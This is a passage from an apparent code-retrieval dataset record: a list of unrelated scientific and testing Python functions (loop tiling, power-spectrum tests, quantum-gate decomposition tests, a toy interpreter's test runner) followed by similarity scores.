extract this loop structure\n id, lb_exp, ub_exp, st_exp, lbody = self.ast_util.getForLoopInfo(stmt)\n\n # see if the loop bound expressions are bound/free of outer loop iterators\n lb_inames = filter(\n lambda i: self.ast_util.containIdentName(lb_exp, i), outer_loop_inames\n )\n ub_inames = filter(\n lambda i: self.ast_util.containIdentName(ub_exp, i), outer_loop_inames\n )\n\n # skip loops with bound expressions that are free of outer loop iterators\n if not lb_inames and not ub_inames:\n lbound_info_seq.append(None)\n continue\n\n # check if this loop runs only once\n is_one_time_loop = str(lb_exp) == str(ub_exp)\n\n # generate booleans to indicate the needs of prolog, epilog, and orio.main.tiled loop\n if is_one_time_loop:\n need_tiled_loop = False\n need_prolog = False\n need_epilog = False\n else:\n need_tiled_loop = True\n need_prolog = len(lb_inames) > 0\n need_epilog = len(ub_inames) > 0\n\n # generate new variable names for both the new lower and upper loop bounds\n if need_tiled_loop:\n lb_name, ub_name = self.__getLoopBoundNames()\n int_vars.extend([lb_name, ub_name])\n else:\n lb_name = \"\"\n ub_name = \"\"\n\n # append information about the new loop bounds\n lbinfo = (lb_name, ub_name, need_prolog, need_epilog, need_tiled_loop)\n lbound_info_seq.append(lbinfo)\n\n # skip generating loop-bound scanning code (if it's a one-time loop)\n if not need_tiled_loop:\n continue\n\n # generate loop-bound scanning code for the prolog\n if str(lb_exp) in lb_exps_table:\n lb_var = lb_exps_table[str(lb_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n post_scan_stmts.append(ast.ExpStmt(a))\n else:\n if need_prolog:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), min_int.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n a = ast.BinOpExp(\n ast.IdentExp(lb_name),\n ast.FunCallExp(\n ast.IdentExp(\"max\"),\n [ast.IdentExp(lb_name), lb_exp.replicate()],\n ),\n ast.BinOpExp.EQ_ASGN,\n )\n scan_loops.insertLoop(lb_inames, ast.ExpStmt(a))\n else:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n lb_exps_table[str(lb_exp)] = ast.IdentExp(lb_name)\n\n # generate loop-bound scaning code for the epilog\n if str(ub_exp) in ub_exps_table:\n ub_var = ub_exps_table[str(ub_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n post_scan_stmts.append(ast.ExpStmt(a))\n else:\n if need_epilog:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), max_int.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n a = ast.BinOpExp(\n ast.IdentExp(ub_name),\n ast.FunCallExp(\n ast.IdentExp(\"min\"),\n [ast.IdentExp(ub_name), ub_exp.replicate()],\n ),\n ast.BinOpExp.EQ_ASGN,\n )\n scan_loops.insertLoop(ub_inames, ast.ExpStmt(a))\n else:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n pre_scan_stmts.append(ast.ExpStmt(a))\n ub_exps_table[str(ub_exp)] = ast.IdentExp(ub_name)\n\n # build a new loop information tabe for generating the loop-bound scanning code\n n_loop_info_table = {}\n for iname, linfo in loop_info_table.items():\n _, _, _, st_exp, _ = linfo\n n_loop_info_table[iname] = (\n self.__getTileSizeName(iname, tile_level),\n self.__getTileIterName(iname, tile_level),\n st_exp,\n )\n\n # convert the \"SimpleLoop\" abstractions into loop ASTs\n scan_loop_stmts = scan_loops.convertToASTs(tile_level, n_loop_info_table)\n\n # merge all scanning statements\n 
scan_stmts = pre_scan_stmts + scan_loop_stmts + post_scan_stmts\n\n # return all necessary information\n return (scan_stmts, lbound_info_seq, int_vars)", "def test_window_funcs():\n # get a PSpecData\n uvd = UVData()\n uvd.read_miriad(\n os.path.join(DATA_PATH, 'zen.even.xx.LST.1.28828.uvOCRSA'),\n use_future_array_shapes=True\n )\n beam = pspecbeam.PSpecBeamUV(os.path.join(DATA_PATH, \"HERA_NF_dipole_power.beamfits\"))\n ds = pspecdata.PSpecData(dsets=[copy.deepcopy(uvd)], beam=beam)\n ds.set_spw((0, 20))\n ds.set_taper('bh')\n bl = (37, 38)\n key = (0, bl, 'xx')\n d = uvd.get_data(bl)\n C = np.cov(d[:, :20].T).real\n iC = np.linalg.pinv(C)\n # iterate over various R and M matrices and ensure\n # normalization and dtype is consistent\n for data_weight in ['identity', 'iC']:\n ds.set_weighting(data_weight)\n for norm in ['H^-1', 'I', 'V^-1/2']:\n for exact_norm in [True, False]:\n if exact_norm and norm != 'I':\n # exact_norm only supported for norm == 'I'\n continue\n ds.clear_cache()\n if data_weight == 'iC':\n # fill R with iC\n ds._R[(0, (37, 38, 'xx'), 'iC', 'bh')] = iC\n # compute G and H\n Gv = ds.get_G(key, key, exact_norm=exact_norm, pol='xx')\n Hv = ds.get_H(key, key, exact_norm=exact_norm, pol='xx')\n Mv, Wv = ds.get_MW(Gv, Hv, mode=norm, exact_norm=exact_norm,\n band_covar=C)\n # assert row-sum is normalized to 1\n assert np.isclose(Wv.sum(axis=1).real, 1).all()\n # assert this is a real matrix, even though imag is populated\n assert np.isclose(Wv.imag, 0, atol=1e-6).all()", "def omt_check(grade_list_idx, grade_list_i, grade_list_j):\n return grade_list_idx == (grade_list_i + grade_list_j)", "def outer_perimeter(c, stencil=nn_stencil):\n\n return np.logical_and(np.logical_not(c),\n coordination(c, stencil=stencil) > 0)", "def tile_calculation(xi, yi, axi, ayi, positions, weights):\n for j in range(cuda.blockDim.x):\n xj = positions[j,0]\n yj = positions[j,1]\n wj = weights[j]\n axi, ayi = body_body_interaction(xi, yi, xj, yj, wj, axi, ayi)\n return axi, ayi", "def test_inexact_prediace(doctest):", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def main():\n argc = len(sys.argv)\n if argc > 1:\n first_arg = sys.argv[1]\n if first_arg == '--test':\n env = environment.Environment()\n execution.execute_statement('x = 
3', env)\n execution.execute_statement('x+=7', env)\n execution.execute_statement('y=9.23', env)\n env.new_frame()\n execution.execute_statement('x = 5', env)\n print(env.frames)\n execution.execute_statement('z=\"hello world\"', env)\n execution.execute_statement('z +=\"!!!\"', env)\n execution.execute_statement('a= `gelatin`', env)\n print(env.frames)\n ast = ast2.AST(\"3*4+5 ^ 7\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n ast = ast2.AST(\"18+15*9:3+10\")\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n\n print(execution.evaluate_expression('1+2+3+4', environment.Environment()))\n print(execution.evaluate_expression('45+7*8', environment.Environment()))\n print(execution.evaluate_expression('3.2+18^2-7', environment.Environment()))\n print(execution.evaluate_expression('1:2 + 1:3 + 1:5', environment.Environment()))\n print(execution.evaluate_expression('2:3 + 3^3 - 1:5', environment.Environment()))\n print(execution.evaluate_expression('1234', environment.Environment()))\n \n ast = ast2.AST(\"3 + 1 == 4\")\n print(ast.parse())\n ast = ast2.AST(\"3 + 1 > 4\")\n print(ast.parse())\n ast = ast2.AST(\"18:1 != 18.2\")\n print(ast.parse())\n ast = ast2.AST(\"x = 4\")\n print(ast.parse())\n ast = ast2.AST(\"y = 3 > 4\")\n print(ast.parse())\n \n env2 = environment.Environment()\n execution.execute_statement('x = 3+5*4', env2)\n execution.execute_statement('y = x + 19 - 3*6', env2)\n print(env2.frames)\n elif first_arg == '--test2':\n ast = ast2.AST('x = \"ice cream, eggs, and milk\" + \"...alpha or beta\"')\n print(ast.parse())\n ast = ast2.AST('y = f(1 + 1, 2 + 2, 3 + 3) - g((9+7)*2, 128/(2+2))')\n print(ast.parse())\n ast = ast2.AST('z = f(\"ice cream\", \"eggs and milk\") * g(\"alpha or beta\", 3:8, \"gamma or delta\")')\n print(ast.parse())\n ast = ast2.AST('makeList(1,2,3) + makeList(4,5,6)')\n print(ast.parse())\n ast = ast2.AST('[max(16, 25), max(36, max(49, 64))]')\n print(ast.parse())\n ast = ast2.AST('[concat_lists([10], [20]), concat_lists([30], [40])]')\n print(ast.parse())\n elif first_arg == '--test3':\n ast = ast2.AST('[1, 2, 3]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2), f(3), f(4)]')\n print(ast.split_list_elems())\n ast = ast2.AST('[f(2, 3), f(3, 4, 5), f(4, 1)]')\n print(ast.split_list_elems())\n ast = ast2.AST('1 + 2 * 3')\n print(ast.split_list_elems())\n print(ast.parse())\n elif first_arg == '--test4':\n ast = ast2.AST('x.length()')\n print(ast.parse())\n ast = ast2.AST('[1,2,3].length()')\n print(ast.parse())\n ast = ast2.AST('3.01')\n print(ast.parse())\n ast = ast2.AST('3.1')\n print(ast.parse())\n elif first_arg == '--test5':\n env = environment.Environment()\n env.new_type(['Number'], 'ComplexNumber')\n c = {'$type': 'ComplexNumber', 'real': 1, 'imag': 2}\n print(env.value_is_a(c, 'ComplexNumber'))\n print(env.value_is_a(c, 'Number'))\n print(env.value_is_a(c, 'Int'))\n print(\"\")\n env.new_type(['Object'], 'Food')\n env.new_type(['Food'], 'Pizza')\n env.new_type(['Food'], 'Dessert')\n env.new_type(['Dessert'], 'ChocolateItem')\n env.new_type(['Pizza'], 'PepperoniPizza')\n env.new_type(['Pizza', 'ChocolateItem'], 'ChocolatePizza')\n pepperoni_pizza = {'$type': 'PepperoniPizza'}\n chocolate_pizza = {'$type': 'ChocolatePizza'}\n print(env.value_is_a(pepperoni_pizza, 'PepperoniPizza'))\n print(env.value_is_a(pepperoni_pizza, 'Pizza'))\n print(env.value_is_a(pepperoni_pizza, 'Food'))\n print(env.value_is_a(pepperoni_pizza, 'Dessert'))\n print(env.value_is_a(pepperoni_pizza, 'ChocolateItem'))\n 
print(\"\")\n print(env.value_is_a(chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(chocolate_pizza, 'Pizza'))\n print(env.value_is_a(chocolate_pizza, 'Food'))\n print(env.value_is_a(chocolate_pizza, 'Dessert'))\n print(env.value_is_a(chocolate_pizza, 'ChocolateItem'))\n print(\"\")\n env.new_type(['ChocolatePizza'], 'HugeChocolatePizza')\n huge_chocolate_pizza = {'$type': 'HugeChocolatePizza'}\n print(env.value_is_a(huge_chocolate_pizza, 'PepperoniPizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Pizza'))\n print(env.value_is_a(huge_chocolate_pizza, 'Food'))\n print(env.value_is_a(huge_chocolate_pizza, 'Dessert'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolateItem'))\n print(env.value_is_a(huge_chocolate_pizza, 'ChocolatePizza'))\n print(\"\")\n elif first_arg == '--test6':\n ast = ast2.AST('{1, 2 | 3, 4}')\n print(ast.parse())\n elif first_arg == '--test7':\n ast = ast2.AST('throw \"something\"')\n print(ast.parse())\n elif first_arg == '--test8':\n ast = ast2.AST('true and not false')\n print(ast.parse())\n print(ast.collapse_indices(ast.build_indices()))\n elif first_arg == '--test9':\n sample = \"\"\"\n x = 5 // comment\n // comment\n /* multi\n line\n comment\n */y = 6\n z = \"https://example.com\"\n \"\"\"\n print(prepare_program.preprocess(sample))\n elif first_arg == '--test10':\n ast = ast2.AST('-3.0e5 + 186e-20 * 1e-6 / 28.8e+6 + 34.4e+99')\n print(ast.parse())\n ast = ast2.AST('-3.0E5 + 186E-20 * 1E-6 / 28.8e+6 + 34.4E+99')\n print(ast.parse())\n elif first_arg == '--test11':\n print(execution.is_assignment_statement('a = 5'))\n print(execution.is_assignment_statement('a=5==6'))\n print(execution.is_assignment_statement('not (5==6) and (8>=7)'))\n print(execution.is_assignment_statement('z='))\n elif first_arg == '--test12':\n lines = [\n 'sub this + that',\n 'func Int x + this',\n 'func x + this',\n 'func this * y',\n 'func Int -this',\n 'sub -this',\n 'sub not this',\n 'sub Boolean not this',\n 'sub this-b',\n 'sub b-this',\n 'func Int-this',\n 'func Int- this',\n 'sub Int - this'\n ]\n print(prepare_program.replace_op_overload_syntax(lines))\n elif first_arg == '--test-tree-merge':\n tests.test_tree_merge()\n elif first_arg == '--test-all':\n tests.test_all('capacita_programs')\n elif first_arg == '--test-all-fast':\n tests.test_all('capacita_programs', has_delay=False)\n elif first_arg == '--test-repl':\n tests.test_all('capacita_programs', has_delay=True, use_repl=True)\n elif first_arg == '--test-repl-fast':\n tests.test_all('capacita_programs', has_delay=False, use_repl=True)\n elif first_arg == '--test-file' and argc > 2:\n if argc == 4 and sys.argv[2] == '--repl':\n tests.test_file(sys.argv[3], use_repl=True)\n else:\n tests.test_file(sys.argv[2], use_repl=False)\n else:\n # Run a program from a text file:\n file_name = first_arg\n execute_file(file_name)\n exit()\n repl()", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def testfunction(expr,n):\n \n if expr == g_plus: init, expr = R1d.SpinUp, g_plus\n elif expr == g_minus: init, expr = R1d.SpinDown, g_minus\n else: return \"error\"\n \n a = McLaurin(expr, n) \n \n bool_list = []\n for n in range(5):\n for i in range(-n,n+1):\n bool_list.append(Coef(a,n,i) == R1d.a(n,i, init))\n if bool_list[-1] == False:\n print(\"Step: \", n, \" pos: \", i)\n return all(bool_list)", "def test_lifted_index_xarray(index_xarray_data):\n result = lifted_index(index_xarray_data.isobaric, index_xarray_data.temperature,\n 
index_xarray_data.profile)\n assert_array_almost_equal(result, np.full((1, 1, 2, 3), 7) * units.delta_degC)", "def test_cost_consideration():\n # input\n net = create_test_net()\n idx = pp.create_sgen(net, 1, 1.3, index=2)\n pp.create_poly_cost(net, idx, \"sgen\", 2.3, index=4)\n pp.runpp(net)\n assert all(net.sgen.index.values == np.array([0, 5, 2]))\n assert all(net.poly_cost.element == np.array([0, 0, 5, 2]))\n\n for cost_type in [\"poly_cost\", \"pwl_cost\"]:\n\n if cost_type == \"pwl_cost\":\n for poly in net.poly_cost.itertuples():\n net.poly_cost.drop(poly.Index, inplace=True)\n pp.create_pwl_cost(net, poly.element, poly.et, [[0, 20, 1]], index=poly.Index)\n\n # eq generation\n boundary_buses = [0, 2]\n internal_buses = [1]\n eq_net1 = pp.grid_equivalents.get_equivalent(net, \"rei\", boundary_buses, internal_buses)\n eq_net2 = pp.grid_equivalents.get_equivalent(net, \"rei\", boundary_buses, internal_buses,\n return_internal=False)\n\n # check elements\n check_elements_amount(eq_net1, {\"bus\": 6, \"load\": 3, \"sgen\": 3, \"shunt\": 5, \"ext_grid\": 1,\n \"line\": 2, \"impedance\": 10, cost_type: 4},\n check_all_pp_elements=True)\n check_elements_amount(eq_net2, {\"bus\": 5, \"load\": 3, \"sgen\": 2, \"shunt\": 5, \"ext_grid\": 1,\n \"impedance\": 10, cost_type: 3},\n check_all_pp_elements=True)\n assert all(eq_net1.sgen.index.values == np.array([0, 1, 2])) # simple create_sgen()\n # without index=... expected\n assert all(eq_net2.sgen.index.values == np.array([0, 1]))\n\n # --- check poly cost\n # eq_net1\n assert np.all(net[cost_type].loc[net[cost_type].et == \"ext_grid\"].values ==\n eq_net1[cost_type].loc[eq_net1[cost_type].et == \"ext_grid\"])\n for i in range(3):\n idx_net = net.sgen.sort_values(\"p_mw\").index[i]\n idx_eq_net = eq_net1.sgen.sort_values(\"p_mw\").index[i]\n assert np.all(net[cost_type].loc[(net[cost_type].element == idx_net) &\n (net[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values ==\n eq_net1[cost_type].loc[(eq_net1[cost_type].element == idx_eq_net) &\n (eq_net1[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values)\n\n # eq_net2\n assert np.all(net[cost_type].loc[net[cost_type].et == \"ext_grid\"].values ==\n eq_net2[cost_type].loc[eq_net2[cost_type].et == \"ext_grid\"])\n for i in range(2):\n idx_net = net.sgen.loc[~net.sgen.bus.isin(boundary_buses+internal_buses)].sort_values(\n \"p_mw\").index[i]\n idx_eq_net = eq_net2.sgen.sort_values(\"p_mw\").index[i]\n assert np.all(net[cost_type].loc[(net[cost_type].element == idx_net) &\n (net[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values ==\n eq_net2[cost_type].loc[(eq_net2[cost_type].element == idx_eq_net) &\n (eq_net2[cost_type].et == \"sgen\")].drop(\n columns=[\"element\"]).values)", "def test_binops(self):", "def test_ex_2_7(self):\n\n wam = WAM()\n wam.execute(self.fig_2_9_instrs[:-1]) # last instruction is call; remove it\n wam.execute(self.fig_2_10_instrs)\n aW = wam.deref_reg(4)\n aX = wam.deref_reg(4)\n aY = wam.deref_reg(5)\n aZ = wam.deref_reg(1)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def at_b (self):\n self.argc = int((len(n.coord[0]))/2)\n self.pts_con = np.array(self.coord[:,self.argc:len(n.coord[0])])\n\n self.xd = self.xdi\n self.zd = self.zdi \n \n for i, x in enumerate(self.xdi):\n self.aux_con = self.pts_con[0] - x \n self.arg1 = np.argmin(abs(self.aux_con)) \n \n if 
(self.aux_con[self.arg1] < 0 and self.arg1 == 0) or (self.aux_con[self.arg1] > 0 and self.arg1 == len(self.aux_con)-1):\n self.yd[i] = 99999.\n #print(self.yd[i],self.arg1)\n #print(self.aux_con)\n \n elif (self.aux_con[self.arg1] > 0 and self.aux_con[self.arg1+1] > self.aux_con[self.arg1]): #(self.aux_con[self.arg1] < 0 and self.aux_con[self.arg1-1] > self.aux_con[self.arg1]) or \n self.yd[i] = 99999.\n #print(self.yd[i],self.arg1)\n #print(self.aux_con)\n \n elif self.aux_con[self.arg1] < 0:\n #print(self.arg1)\n self.arg1 = self.arg1 + self.argc\n self.arg2 = self.arg1 - 1\n self.yd[i] = self.coord[1,n.arg1] + (x-self.coord[0,n.arg1])*(self.coord[1,n.arg2]-self.coord[1,n.arg1])/(self.coord[0,n.arg2]-self.coord[0,n.arg1])\n #print(self.yd[i],self.arg1,self.arg2)\n #print(self.aux_con)\n\n elif self.aux_con[self.arg1] > 0:\n #print(self.arg1) \n self.arg1 = self.arg1 + self.argc\n self.arg2 = self.arg1 + 1\n self.yd[i] = self.coord[1,n.arg1] + (x-self.coord[0,n.arg1])*(self.coord[1,n.arg2]-self.coord[1,n.arg1])/(self.coord[0,n.arg2]-self.coord[0,n.arg1]) \n #print(self.yd[i],self.arg1,self.arg2)\n #print(self.aux_con)\n \n #print('Defensa {0}\\n{1}: {2}\\n{3}: {4}'.format(i,self.arg1,self.aux_con[self.arg1],self.arg2,self.aux_con[self.arg2])) \n \n #self.yd = self.yd\n self.b = np.array([self.xd,self.yd,self.zd])\n #self.b.loc[:,('y')] = self.b.loc[:,('y')] ", "def border_function_generator(self, stencil):\n\n def is_on_border(indice):\n for i in range(self.dim):\n if indice[0] < stencil.b[0][0] or indice[0] >= self.mid.shape[0]+stencil.b[0][0]:\n return True\n return is_on_border", "def convert_where_index(g, op, block):\n\n condition = g.get_node(op.input(\"Condition\")[0])\n out = _op.argwhere(condition)\n g.add_node(op.output(\"Out\")[0], out)", "def test_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n register q2[2]\n register q3[3]\n X q2\n CNOT q2 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array)\n assert isclose(result, [1.0, 0.0, 1.0, 0.0]).all()", "def test_psx_zsx_special_cases(self):\n oqed_psx = OneQubitEulerDecomposer(basis=\"PSX\")\n oqed_zsx = OneQubitEulerDecomposer(basis=\"ZSX\")\n oqed_zsxx = OneQubitEulerDecomposer(basis=\"ZSXX\")\n theta = np.pi / 3\n phi = np.pi / 5\n lam = np.pi / 7\n test_gates = [\n UGate(np.pi, phi, lam),\n UGate(-np.pi, phi, lam),\n # test abs(lam + phi + theta) near 0\n UGate(np.pi, np.pi / 3, 2 * np.pi / 3),\n # test theta=pi/2\n UGate(np.pi / 2, phi, lam),\n # test theta=pi/2 and theta+lam=0\n UGate(np.pi / 2, phi, -np.pi / 2),\n # test theta close to 3*pi/2 and theta+phi=2*pi\n UGate(3 * np.pi / 2, np.pi / 2, lam),\n # test theta 0\n UGate(0, phi, lam),\n # test phi 0\n UGate(theta, 0, lam),\n # test lam 0\n UGate(theta, phi, 0),\n ]\n\n for gate in test_gates:\n unitary = gate.to_matrix()\n qc_psx = oqed_psx(unitary)\n qc_zsx = oqed_zsx(unitary)\n qc_zsxx = oqed_zsxx(unitary)\n self.assertTrue(np.allclose(unitary, Operator(qc_psx).data))\n self.assertTrue(np.allclose(unitary, Operator(qc_zsx).data))\n self.assertTrue(np.allclose(unitary, Operator(qc_zsxx).data))" ]
[ "0.6950202", "0.58628595", "0.56040186", "0.5595086", "0.5519812", "0.54418904", "0.54108006", "0.533119", "0.53181374", "0.53098184", "0.5292402", "0.5292149", "0.5247795", "0.5246134", "0.523379", "0.5228938", "0.5216184", "0.51775336", "0.51391", "0.513825", "0.51371264", "0.5125601", "0.51237714", "0.5118783", "0.5106406", "0.5094798", "0.50782824", "0.50654495", "0.50590676", "0.5056554", "0.50441825", "0.50390106", "0.50383204", "0.5019494", "0.4996368", "0.4975851", "0.49692708", "0.49681807", "0.4968043", "0.49635723", "0.49625936", "0.49616665", "0.495337", "0.49505645", "0.4943826", "0.49414274", "0.49384204", "0.49280557", "0.49273977", "0.4924433", "0.49242586", "0.49241883", "0.49174675", "0.49077767", "0.489369", "0.488927", "0.48886022", "0.48859486", "0.4884594", "0.48817906", "0.48758838", "0.48735794", "0.48668125", "0.48631883", "0.48626083", "0.4862096", "0.48617166", "0.48517752", "0.4842776", "0.48379698", "0.48335326", "0.4831361", "0.48308483", "0.4827149", "0.48253846", "0.48238868", "0.48219004", "0.48201695", "0.4819852", "0.48100322", "0.48065498", "0.4801199", "0.4801016", "0.47915724", "0.47905988", "0.47899622", "0.47887725", "0.4780322", "0.47772622", "0.4776111", "0.47730157", "0.47672412", "0.476177", "0.47587708", "0.47571555", "0.47538033", "0.47502536", "0.47407544", "0.4734952", "0.47343642" ]
0.6362784
1
Test that the calltime overriding of Operator arguments works
def test_override_cache_aliasing(self): i, j, k, l = dimify('i j k l') a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode='indexed').base.function a1 = symbol(name='a', dimensions=(i, j, k, l), value=3., mode='indexed').base.function a2 = symbol(name='a', dimensions=(i, j, k, l), value=4., mode='indexed').base.function eqn = Eq(a, a+3) op = Operator(eqn) op() op(a=a1) op(a=a2) shape = [d.size for d in [i, j, k, l]] assert(np.allclose(a.data, np.zeros(shape) + 5)) assert(np.allclose(a1.data, np.zeros(shape) + 6)) assert(np.allclose(a2.data, np.zeros(shape) + 7))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __call__(a, b):", "def _OverloadOperator(operator): # pylint: disable=invalid-name\n\n tensor_oper = getattr(ops.Tensor, operator)\n\n def _run_op(a, *args):\n # pylint: disable=protected-access\n value = a._AsTensor()\n return tensor_oper(value, *args)\n\n # Propagate __doc__ to wrapper\n try:\n _run_op.__doc__ = tensor_oper.__doc__\n except AttributeError:\n pass\n\n setattr(ZfitBaseVariable, operator, _run_op)", "def test_direct_invocation_works():\n assert (_add)(*[1, 2], **{\"3\": 3, \"4\": 4}) == 10", "def test_dup_args_in_call(x):\n return x * x", "def test_dup_args_in_call(x):\n return x * x", "def _OverloadOperator(operator): # pylint: disable=invalid-name\n\n tensor_oper = getattr(ops.Tensor, operator)\n\n def _run_op(a, *args):\n # pylint: disable=protected-access\n value = a._AsTensor()\n return tensor_oper(value, *args)\n\n # Propagate __doc__ to wrapper\n try:\n _run_op.__doc__ = tensor_oper.__doc__\n except AttributeError:\n pass\n\n setattr(ComposedVariable, operator, _run_op)", "def _equal_to_op(spec):", "def _binaryop(self, other, op: str):\n raise NotImplementedError", "def base_operator(self):\n raise NotImplementedError()", "def operate(\n self, op: OperatorType, *other: Any, **kwargs: Any\n ) -> Operators:\n raise NotImplementedError(str(op))", "def _override_operator(class_object, operator, func):\n existing = getattr(class_object, operator, None)\n if existing is not None:\n # Check to see if this is a default method-wrapper or slot wrapper which\n # will be true for the comparison operators.\n if not isinstance(existing, type(object.__lt__)) and not isinstance(existing, type(object.__repr__)):\n raise ValueError(\"operator %s cannot be overwritten again on class %s.\" %(operator, class_object))\n setattr(class_object, operator, func)", "def test_operator(self):\n\t\tfor op in self.ops:\n\t\t\tself.filter.set_operator(op)\n\t\t\tself.assertEqual(self.filter.operator.value, op)", "def test_multi_arg_workaround():\n\n @type_checked\n def _run_test(ok:MySubClassedObject):\n assert ok.x == 1\n assert ok.y == 2\n\n _run_test((1, 2))", "def __call__(self, *inputs):\n raise NotImplementedError", "def __call__(self, x):", "def testOperation(self):\n gen = self.gen\n prof = self.profile\n\n # Try the direct evaluation\n gen.operation()\n self.assertTrue(array_equal(prof.x, prof.ycalc))\n\n # Try evaluation through __call__\n gen(prof.x)\n self.assertTrue(array_equal(prof.x, prof.ycalc))\n return", "def test_wrapper_with_args():\n my_method = SGMethod(\"test\")\n other_method = SGMethod(\"other\")\n par1 = other_method.create_parameter(\"par1\")\n \n my_method.calls(other_method, ['\"test\"'])\n my_method.check_call_validity();\n \n assert other_method == my_method.method_called\n assert len(my_method.args) == 1\n assert par1 != my_method.args[0]\n assert '\"test\"' == my_method.args[0]", "def check_args(*args):\n if not len(args) == 3:\n raise OperatorCompileException(compile_time_error(*args))\n if not getattr(operator, args[1]):\n raise OperatorCompileException(*args)", "def __nonzero__(*args, **kwargs):\n \n pass", "def __call__(value):", "def _OverloadAllOperators(): # pylint: disable=invalid-name\n for operator in ops.Tensor.OVERLOADABLE_OPERATORS:\n ZfitBaseVariable._OverloadOperator(operator)\n # For slicing, bind getitem differently than a tensor (use SliceHelperVar\n # instead)\n # pylint: disable=protected-access\n setattr(ZfitBaseVariable, \"__getitem__\", array_ops._SliceHelperVar)", "def __call__(self, x):\n pass", "def test_override_symbol(self):\n i, j, 
k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __call__(self, a, b):\n # STUDENT CODE HERE\n raise NotImplementedError", "def __init__(self):\n super(OperatorCodegen, self).__init__()", "def test_custom_operators():\n grid = UnitGrid([32])\n field = ScalarField.random_normal(grid)\n eq = PDE({\"u\": \"undefined(u)\"})\n\n with pytest.raises(ValueError):\n eq.evolution_rate(field)\n\n def make_op(state):\n return lambda state: state\n\n UnitGrid.register_operator(\"undefined\", make_op)\n\n eq._cache = {} # reset cache\n res = eq.evolution_rate(field)\n np.testing.assert_allclose(field.data, res.data)\n\n del UnitGrid._operators[\"undefined\"] # reset original state", "def _OverloadAllOperators(): # pylint: disable=invalid-name\n for operator in ops.Tensor.OVERLOADABLE_OPERATORS:\n ComposedVariable._OverloadOperator(operator)\n # For slicing, bind getitem differently than a tensor (use SliceHelperVar\n # instead)\n # pylint: disable=protected-access\n setattr(ComposedVariable, \"__getitem__\", array_ops._SliceHelperVar)", "def __call__(self, args):", "def __call__(self, args, kwargs):\n raise NotImplementedError", "def test_binops(self):", "def test_add():\n\n assert add(1, 1) == 2\n assert add(1, 2) == add(2, 1) == 3", "def _append_operator(self, operator):", "def test_kwargs(self):\n\n @sync_performer\n def p(dispatcher, intent, extra):\n return extra\n\n dispatcher = lambda _: partial(p, extra=\"extra val\")\n result = sync_perform(dispatcher, Effect(\"foo\"))\n self.assertEqual(result, \"extra val\")", "def __call__(self, *args, **kwargs): # real signature unknown\n 